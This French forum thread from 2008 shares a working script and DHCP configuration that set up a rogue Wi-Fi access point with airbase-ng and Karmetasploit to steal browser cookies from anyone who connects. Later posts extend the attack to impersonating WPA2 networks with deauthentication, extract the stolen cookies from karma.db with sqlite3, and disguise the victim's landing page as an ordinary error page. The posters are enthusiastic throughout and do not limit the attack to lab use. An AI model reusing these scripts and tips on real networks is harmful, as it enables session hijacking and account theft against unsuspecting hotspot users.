Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-09-2008 16:50:55

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Hello.
Je viens de tester un petit quelque chose, alors je vous en fait part, c'est tout simplement incroyable !

Pour pouvoir appliquer la chose, vous devrez avoir mis à jour aircrack-ng (mise à jour non incluse dans BT3 final, attention !) en faisant

svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
cd aircrack-ng
make
make install

Ensuite enregistrer les lignes suivantes

option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

dans le fichier que vous allez créer  /msf3/dhcpd.conf

Enfin, vous aurez à mettre à jour Framework version 3 en allant dans "Menu KDE>Backtrack>Penetration>Framework Version 3>Framework3-MsfUpdate"

Maintenant, nous somme bon pour partir dans le feu de l'action !
Enregistrez les lignes suivantes dans un fichier script.sh ou ce que vous voulez en .sh :

#!/bin/bash

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 10 -e Free-hotspot -v wlan0 >/dev/null 2>&1 &
sleep 2
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0
sleep 2
ifconfig at0 mtu 1800
tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

dans lequel vous aurez pris soin de remplacer, le cas échéant, wlan0 par le nom de la carte que vous désirez utiliser et d'arranger le nom du hotspot (ici Free-hotspot) et sa channel si vous le désirez.

Faites un clic droit sur le fichier ainsi créé, cochez "is executable" dans les permissions, ouvrez un terminal dans le même répertoire, et tappez "script.sh" ; en principe, à ce niveau, depuis un autre pc, vous devriez voir le nouveau AP qui est apparu.
En vous y connectant et en tentant d'y ouvrir une page à l'aide du navigateur, Karmetasploit va voler tout les cookies selon une liste de sites intéressant (gmail, myspace, blogger, etc...) et les écrires dans un fichier "karma.db", fichier lisible pendant que Karmetasploit tourne en tappant db_notes et en faisant enter.

(tel que dans le script, le fake ap va répondre à n'importe quelle requête d'SSID (argument -P) et en limiter 30 (-C 30)

N'abusez pas, le monde est à vos pied à présent big_smile

Sources :
http://forums.remote-exploit.org/showthread.php?p=99040
http://www.metasploit.com/dev/trac/wiki/Karmetasploit
http://bricowifi.blogspot.com/2008/09/t … ploit.html

Dernière modification par alan-smithee (10-09-2008 16:55:49)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-09-2008 18:50:29

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

En voila du bel outil! smile Merci beaucoup pour les explications détaillées.

C'est le genre de truc un peu dangereux, à ne pas mettre entre toutes les mains. Ce genre de tool montre, s'i cela était encore nécessaire, comme la sécurisation d'un réseau wifi est véritablement une chose très importante.

J'ai une petite question: est il possible de modifier la configuration de Karmetasploit pour qu'il récupère des cookies provenant des sites que l'on souhaite?

Hors Ligne

#3 10-09-2008 20:37:06

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Voila, après un petit fouillage de répertoire, l'essentiel se passe dans le dossier /msf3/data/exploits/capture/http/ ; et plus particulièrement le  fichier "sites.txt" : en y ajoutant l'entrée "www.crack-wifi.com", j'ai su récupérer le cookie qui permet la connexion auto en tant que membre. Reste à explorer un peu l'affaire et à regarder la docu présente dans un répertoire de l'arborescence.
En tout cas, c'est une superbe illustration sur "pourquoi ne pas se connecter à un hotspot gratuit sans aucune protection et dont on n'a aucune garantie qu'il s'agisse du bon AP"

Hors Ligne

#4 10-09-2008 22:55:08

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

cool tout ça amigo!   smile


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#5 11-09-2008 11:36:29

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Apparament, cela va bien plus loin que les réseau open : maintenant, vous savez pirater un réseau, même en WPA2 et récupérer des cookies, le tout sans même connaitre la moindre clé WPA2 !.(mission accomplie sur mon propre AP o_0 ...)

Je m'explique : vous modifiez le script pour définir le wpa2 comme étant l'encryptage du rogue AP (rajoutez l'argument -Z 4 dans la ligne airbase-ng ; voyez la docu sur airbase du site aircrack-ng.org pour d'autres moyen d'encryptage), vous l'exécutez, puis ensuite vous lancez des deauth non-ciblé (broadcasté) sur l'AP réel.
Et que se passe-t-il ? Si vous êtes assez proche (que vous avez un qualité de connexion meilleure entre vous et le client qu'entre le client et le routeur), ben le client va s'auto-connecter sur votre faux AP, et ce quelque soit le SSID demandé (argument -P) tant que le cryptage enregistré dans la config du pc est du WPA2 !!!!!
(le client va se connecter en WPA2 sur votre faux access point, mais en fait ce n'est qu'un maquillage, une supercherie pour duper le client ! Et puis là, tout se passe comme en open : dès que le client va ouvrir une page web, hop, tout les cookies y passent...)

En bref : à l'heure actuelle, même en WPA2-AES, personne n'est à l'abris de se faire dérober son compte mail, son compte ftp, ses comptes de forum, etc... par la récupération de cookies. Nous entrons dans une nouvelle ère de piraterie informatique mes chers. Et ça c'est en exclu sur ce forum big_smile
J'en suis arrivé, tel certains philosophes, à douter, non pas de la vie, mais de la sécurité même que nous, particulier, devons mettre en place pour se parer de telles attaques : a-t-on besoin de se mettre dès à présent au WPA2-EAP TLS pour être sécurisé correctement ? Ce genre d'attaque me fait froid dans le dos.

C'était Alan-smithee, dans "Premier pavé dans la marre jusqu'à présent claire du WPA2-AES"

Hors Ligne

#6 11-09-2008 21:12:29

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

C'est véritablement une bombe cet outil! L'utilisation de airbase-ng couplé à karmetasploit (karma plus metasploit 3) est, me semble t il, à l'heure actuelle, l'attaque la plus puissante contre un réseau wifi! Lorsque j'ai réalisé le tutoriel sur la rogue ap, je voulais que tout le monde comprenne bien que le wifi est particulièrement propice aux attaques man in the middle, spécialement sur des réseaux mal sécurisés. Depuis ettercap, les choses ont évolués et de nombreux tools sont sortis, celui ci est vraiment surpuissant...

Si l'utilisation de ce genre d'outil n'est pas à la portée du premier venu, le fait d'avoir scripté (un grand merci à l'auteur du script) le lancement et la configuration de Karmetasploit rend déja la chose faisable simplement pour pas mal de personnes. Nul doute que cet outil va faire des dégats... Je le dis comme je le pense, la sécurité des réseaux wifi dans son ensemble vient de prendre une grande claque!

Etant donné que les médias s'intéressent peu à ce genre de chose, puisque le monde du "hacking" reste obscur pour le grand public, et étant donné que les fournisseurs d'accès savent manipuler les masses et faire croire à leurs clients qu'ils sont en sécurité, on peut penser que cet outil ne fera pas la une des journaux; pourtant karmetasploit est public, accessible à tous et c'est une petite révolution, comme on n'en avait pas connu depuis la sortie d'aircrack, et depuis le début des attaques man in the middle... Le concept de la rogue ap couplé à cet "aspirateur de cookies", c'est vraiment très impressionnant.

Nul doute que les véritables maniaques de la sécurité vont sérieusement se prendre la tete sur leur configuration réseau après avoir découvert cela!

Alan-smithee, cet excellent post mérite d'etre épinglé wink

Hors Ligne

#7 11-09-2008 22:32:56

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Fin, voila, la messe est dite, je n'en demandais pas tant non plus, mais ça m'a fait un choc de voir BT3 récupérer tout mes cookies comme ça, sans prise de tête ni rien, et au travers de faiblesse basique d'un réseau wifi ; la sureté de pouvoir contrôler que l'AP est bien l'AP légitime.
En même temps je me demande depuis combien de temps cet outil existe et a échappé à ma connaissance.

A part ça, j'ai encore un petit truc à rajouter ; cassez le script en deux parties : une partie jusqu'au montage du rogue AP, (airbase-ng) et une partie pour le reste, ainsi on peut voir qui se connecte au rogue AP, c'est plus pratique wink

Hors Ligne

#8 12-09-2008 12:13:24

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

j'ai testé ça hier, un bel AP tout neuf est apparu dans les airs!  smile
Bon, sur le coup il y a a eu de candidats intéréssés!  smile

A part ça, tu parles de casser le script en deux parties, concrètement, tu l'adaptes comment?


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#9 12-09-2008 13:23:44

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

J'ai fait les deux parties suivantes :
1 :

#!/bin/bash

killall -9 dhcpd tcpdump airbase-ng

airmon-ng start wlan1
modprobe tun

airbase-ng -P -C 30 -c 3 -e Free-hotspot -Z 4 -v wlan1

et le 2ème :

#!/bin/bash

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0
sleep 2
ifconfig at0 mtu 1800
tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

Ca te permet de laisser tourner le deuxième pendant que, au besoin, tu adaptes le premier pour modifier les paramètres du rogue AP. (voir la docu d'aircrack-ng.org)

PS : jouez un peu avec la commande airbase-ng en essayant les exemples fournies sur aircrack-ng.org ;-) ,il y a plein de truc qui pourrai vous intéresser : provoquer un handshake sans AP par exemple etc...

Dernière modification par alan-smithee (12-09-2008 13:34:26)

Hors Ligne

#10 12-09-2008 14:18:55

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

okey dockey!  smile

Sinon, tu es sensé voir apparaître les connectés dans quelle partie du script? La deuxième bien sur?

Dernière modification par Grand Hibou (12-09-2008 14:24:05)


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#11 12-09-2008 14:41:10

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

oulahhhhhhhhhhhhhhhhhh, ça a mordu!
ven diou,mille milliard de mille sabords, nom d'un petit bonhomme!
ventre saint-gris!!
impressionnant! 

fc1f6b8aa671af011f55cecd0236c.gif


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#12 12-09-2008 14:44:19

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Tu dois voir les personnes se connecter dans la première partie du script, avec airbase-ng

Tu en perds la tête ? lol
Allez, explique-nous, qu'est-ce que tu as fait ?

Hors Ligne

#13 12-09-2008 15:09:39

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

En fait j'avais lancé les 2 scripts à part donc là, mais dans le même shell.
Et tout à coup, ça a démarré, une connection, mais j'ai pas eu le temps de voir dans la première partie ce qui se passait, ça défilait à donf dans le shell!
il y avait des requêtes http, des url et des cookies aussi surtout en pagaille.
Et en fait même en remontant dans le shell je n'ai plus pu voir la première partie du tout malheureusement. Faudra que je lance ça dans 2 shell différents la prochaine fois.


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#14 12-09-2008 19:21:12

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Quand la première partie du script est lancée, elle s'execute puis stoppe. Donc en fait je crois pas qu'on puisse voir en direct les machines connectées?
Sinon, la commande db_notes a pas l'air de marcher, Chez moi en tout cas, commande introuvable.


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#15 12-09-2008 19:38:31

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Non, non, tu as mal compris, la commande db_notes ne peut s'effectuer que lorsque karma tourne en même temps. Tu vois que le programme se met en pause, tu tappes la commande et tu presse enter, et là ça fonctionne ;-)
(autrement tu peux ouvrir le fichier "karma.db", mais c'est pas très lisible car pas prévu ; c'est un fichier binaire)

Dernière modification par alan-smithee (12-09-2008 19:40:04)

Hors Ligne

#16 12-09-2008 19:53:33

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

j'ai aussi trouvé autre chose là pour lire le fichier de sqlite3 comme il faut, en html:


sqlite3 karma.db
sqlite>.mode html
sqlite>.output karma.html
sqlite>select * from notes;

et là tu as un fichier html  avec toutes les bonnes infos.  smile


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#17 13-09-2008 11:22:06

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

J'ai essayé, mais je n'ai pas réussi :-/
Enfin, ce n'est pas trop grave, on arrive quand même à récupérer les cookies lorsqu'ils s'affichent dans la console après un "db_notes".

Dites, je dois vous expliquer comment réutiliser un cookie aspiré par cette méthode ou vous savez déjà  ? C'est extrêmement simple, les outils sont intégrés à la version de Firefox de BT3 ;-)

Hors Ligne

#18 13-09-2008 11:41:36

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Je ne veux pas faire le boulet... ( smile )

Mais quelques explications sur la réutilisation des cookies m'intéresseraient, via firefox ou en les "forgeant" pour les utiliser avec le navigateur de son choix (ça doit etre possible à faire?).

Quant à la technique pour générer un fichier html à partir de la base de données karma.db de Karmetasploit, peut etre que Grand Hibou pourrait nous donner davantage de détails là dessus...

Merci à vous wink

Hors Ligne

#19 13-09-2008 12:09:51

alan-smithee
Membre Indétronable
Inscription : 18-07-2008
Messages : 150

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Je crée un topic-tuto sur comment créer des cookies dans BT3 de suite wink

Hors Ligne

#20 13-09-2008 12:21:00

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

alan-smithee> tu as une erreur quand tu tapes les commandes?

Pour génerer le fichier html, vous êtiez bien je suppose dans le bon repertoire? de root smile
là ou est karma.db bien sur.

Sinon, pour les commandes que vous tapez les unes après les autres je les remets ,
Quand vous tapez sqlite3 karma.db il s'ouvre une autre ligne avec "sqlite>" et vous tapez la commande suivante ".mode html" . Puis une autre ligne avec sqlite> où vous taperez  ".output karma.html" puis la dernière avec "select * from notes;"

N'oubliez pas le . devant mode et output!
et ; a la fin de la dernière ligne.

Ensuite vous aurez un fichier html avec tout ce qui est utile.



sqlite3 karma.db
sqlite>.mode html
sqlite>.output karma.html
sqlite>select * from notes;

Dernière modification par Grand Hibou (13-09-2008 12:21:40)


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#21 13-09-2008 13:15:24

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Merci pour cette explication smile

Hors Ligne

#22 18-09-2008 22:14:04

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Bon, j'ai un peu testé l'utilisation de Karmetasploit.

La première chose étonnante est la facilité de lancement de l'attaque, le script lance la rogue ap avec airbase-ng et karma (l'exploit en lui meme), il ne reste qu'à attendre... Bien évidemment, le règlage dhcp décrit plus haut devra etre modifié si on souhaite laisser un accès internet à la "victime" une fois l'attaque effectuée.

Pour la pauvre "victime", voila ce que donne l'ouverture d'un internet explorer:

owned.png
Image taille réelle ici.

Une page étrangement nommée "Hotel Guest Wireless Services", et affichant indéfiniment "Loading..." pendant que l'exploit "exploit/windows/smb/smb_relay" récupère tranquillement les cookies. En bas de l'explorer, on peut voir que de multiples chargements plus que suspects ont lieu. Si vous voyez un jour ce type de page en ouvrant un explorer, il est sérieusement temps de vous alarmer, vous etes "owned" par une rogue ap!!!

Ce petit test m'a permis de mettre en lumière 2 aspects qui font que, tout de meme, karmetasploit n'est pas encore si facile à utiliser:

-La liste des sites contenus dans "msf3/data/exploits/capture/http/sites.txt" n'est pas vraiment adaptée à une utilisation en France, elle mériterait d'etre retravaillée en y incluant les topsites francophones susceptibles de nourrir karmetasploit en cookies.

-L'utilisation en elle meme des cookies n'est pas si aisée, notamment parce que leur "visualisation" mériterait d'etre améliorée pour davantage de clarté. Là, que ce soit dans le shell ou dans le html obtenu grace aux conseils de Grand Hibou, les cookies sont en vrac, il en ressort plein de lignes de caractères avec des = et des noms de domaines, il faut un peu se casser les yeux pour faire du ménage là dedans.

Cela dit, Karmetasploit est extrèmement puissant, je pense que ce n'est qu'un prémice de futures attaques encore plus puissantes qui devraient bientot apparaitre, grace à l'utilisation conjointe d'une rogue ap avec airbase-ng et de metasploit.

Merci encore alan-smithee de nous avoir présenté karmetasploit wink

Hors Ligne

#23 05-10-2008 20:48:53

Fireman
Membre Hyperactif
Lieu : Lyon
Inscription : 28-07-2008
Messages : 52

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Est-ce que comme dans le tuto de la Rogue AP, on peut laisser à l'user la connexion Internet au choix ?
Je veux dire, c'est encore plus puissant si l'user continue sa navigation et que Karmetasploit continue de prendre les cookies au fur et à mesure.
C'est juste pour faire avancer le shmilbick ...
Ah oui aussi j'ai remarqué que le site sur lequel l'user atterrissait était modifiable sur ce chemin :
/msf3/data/exploits/capture/http/index.html

Voilou

Hors Ligne

#24 05-10-2008 21:44:53

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

Il me semble que dans ce cas, une fois que la victime est "karmetasploitée", on ne peut pas lui laisser l'accès au net. J'avais commencé à m'amuser avec cet index.html afin d'y mettre quelque chose de plus discret, je voulais y inclure une image récupérée sur une erreur 404 d'internet explorer afin que l'utilisateur pense avoir un simple problème de connexion, mais je n'ai pas réussi, l'image ne s'afffichait pas.

Ca aurait été sympa, regarde:

404.png
Image taille réelle ici.

J'ai mis dans un pack l'image "erreur 404" et l'index.html qui était censé l'afficher, si quelqu'un veut s'essayer à ça c'est ici: kit erreur 404 karmetasploit. Il doit bien y avoir un moyen d'afficher cette image à l'utilisateur connecté à la rogue ap pendant la récupération des cookies avec karmetasploit...

Quoi qu'il en soit, c'est une attaque très puissante... Airbase-ng est également un outil surpuissant, et couplé à une attaque man in the middle il permet de faire plein de choses. Je vois que ton BT3 a l'air de tourner wink

Hors Ligne

#25 06-10-2008 18:34:56

Fireman
Membre Hyperactif
Lieu : Lyon
Inscription : 28-07-2008
Messages : 52

Re : Script Karmetasploit pour une attaque rogue AP très facile à effectuer

C'est pas super super ressamblant mais bon c'est mieux qu'une page noire loading :

Sinon ya un truc qui me chiffonne c'est que on fait une page d'erreur pour IE sauf que moi les tests jles ai fait sur Ipod Touch, donc sous Safari ... si on veut bien faire, faut faire un index.php avec une condition sur le $_SERVER['HTTP_USER_AGENT'] en faisant en sorte de proposer la bonne page d'erreur au bon navigateur ...
Enfin je dis ca ... roll

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]